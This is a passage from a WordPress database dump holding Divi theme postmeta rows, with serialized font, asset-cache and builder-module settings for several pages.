"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32253,764,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32246,705,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32247,705,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32248,705,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32249,705,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32242,635,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32243,635,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32244,635,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32245,635,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32241,570,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32238,570,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32239,570,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32240,570,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32236,27,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:4:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";i:2;s:111:\"Josefin+Sans:100,200,300,regular,500,600,700,100italic,200italic,300italic,italic,500italic,600italic,700italic\";i:3;s:21:\"ZCOOL+XiaoWei:regular\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32237,27,'_et_builder_module_features_cache','a:2:{i:0;s:52:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"tb\":[],\"wpe\":[]}\";i:1;a:23:{i:0;a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_6eddb203209970b188467e4dd74f5dff\";a:3:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_00814485678686f36a8cfa556f28dd08\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_bb820858dcce43fec0255e890a0c9a4e\";a:9:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_69581f7437a889932c3b0400ba9694b6\";a:7:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_d48fef4c68359d1764264a6fc472f02e\";a:5:{s:4:\"cuma\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:44:\"et_pb_image_119925c8129f7e1891d6842d642e8a55\";a:5:{s:4:\"scef\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_4a971910e29a39e84ef553fed5b3c83b\";a:3:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_5fdc86ca60776fbb6ba6911e4296332d\";a:5:{s:4:\"cuma\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:44:\"et_pb_image_733a6194504fbe8575c2a8f121c7ecd7\";a:5:{s:4:\"scef\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_d255a62fc2274f7ee2b40b3286c0d00e\";a:5:{s:4:\"cuma\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_da2a20260e26a06b948e4cfa1e5f4ca1\";a:9:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_f1caec4f321a00708ef5f54d1cd00cc8\";a:7:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:46:\"et_pb_section_3878c956be0466878d03d5c50b29aa8a\";a:3:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_491f5e54fa2e2f64814f8c3ba456fd79\";a:3:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_c704c0b72a43bb19e67bfdddeb4d7453\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_c49957be018b52d6a04daa7360c40c56\";a:8:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:3:\"bor\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_b65aae719f7164d2152a4d37d29ebf95\";a:3:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_661390ed760e7d65552d7fad2c61901b\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_f01aedfa7da0a4caef798ae1ea129ed3\";a:7:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_4494fef151854cb6f58571c3c543e9d2\";a:7:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_button_6ba1a7e1505517b1351daa232bdedcc1\";a:7:{s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:3:\"but\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_de25f7f13df2da36f0237af20ddd13b3\";a:7:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}}}'),(32233,27,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:6:{i:0;s:13:\"et_pb_section\";i:1;s:9:\"et_pb_row\";i:2;s:12:\"et_pb_column\";i:3;s:12:\"et_pb_button\";i:4;s:11:\"et_pb_image\";i:5;s:10:\"et_pb_text\";}}'),(32234,27,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32235,27,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:20:\"block_layout_enabled\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:1:{i:0;b:1;}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:25:\"media_embedded_in_content\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:6:{i:0;s:41:\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\";i:1;s:18:\"gcid-primary-color\";i:2;s:20:\"gcid-secondary-color\";i:3;s:18:\"gcid-heading-color\";i:4;s:15:\"gcid-body-color\";i:5;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32231,26,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:4:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";i:2;s:21:\"ZCOOL+XiaoWei:regular\";i:3;s:111:\"Josefin+Sans:100,200,300,regular,500,600,700,100italic,200italic,300italic,italic,500italic,600italic,700italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32232,26,'_et_builder_module_features_cache','a:2:{i:0;s:52:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"tb\":[],\"wpe\":[]}\";i:1;a:22:{i:0;a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_458440056d8d0e1cdf00dc66759f8c8f\";a:3:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_c704c0b72a43bb19e67bfdddeb4d7453\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_f3ab3727d405820524d2b910ad4069f4\";a:9:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_628e4cb77cf1a367fa0e72619b93b407\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_3f601ee609534cc94b05c630863b3983\";a:6:{s:4:\"cuma\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:3:\"tra\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:51:\"et_pb_contact_form_79910ade5944584bd86beb059fe791d3\";a:11:{s:4:\"glde\";a:7:{s:15:\"title_font_size\";s:2:\"26\";s:20:\"title_letter_spacing\";s:3:\"0px\";s:17:\"title_line_height\";s:3:\"1em\";s:17:\"captcha_font_size\";s:2:\"14\";s:20:\"form_field_font_size\";s:2:\"14\";s:25:\"form_field_letter_spacing\";s:3:\"0px\";s:22:\"form_field_line_height\";s:5:\"1.7em\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:3:\"bor\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:3:\"but\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:52:\"et_pb_contact_field_44ce7a51068fc81f06b22f90ea1f75c2\";a:6:{s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:52:\"et_pb_contact_field_a82ff5a05585c2b8ef457c89267e20f6\";a:6:{s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:52:\"et_pb_contact_field_bbc5cafe1092b7efd70cb24d6c760ff0\";a:6:{s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_4b1193ed88626c0ae757bd607e15be4f\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_41d234b57619eb561e5f2bfc30ce3610\";a:9:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:46:\"et_pb_section_e330d4344f73e7c98499b5b75b3ee954\";a:3:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:4:\"anim\";b:1;}s:46:\"et_pb_section_cb63b36bce768deae430c0a449251404\";a:3:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_683012fd291d68aa37bc5c81f9eae7dc\";a:3:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_8b39a575ee6e716aa17a4b38776a18f2\";a:10:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:3:\"bor\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_b65aae719f7164d2152a4d37d29ebf95\";a:3:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_661390ed760e7d65552d7fad2c61901b\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_de25f7f13df2da36f0237af20ddd13b3\";a:7:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_4494fef151854cb6f58571c3c543e9d2\";a:7:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_button_520491e5bb80528d48617feaa9b601fb\";a:7:{s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:3:\"but\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_71e0d05c627633744978c7e45672ac0d\";a:9:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}}}'),(32227,1562,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0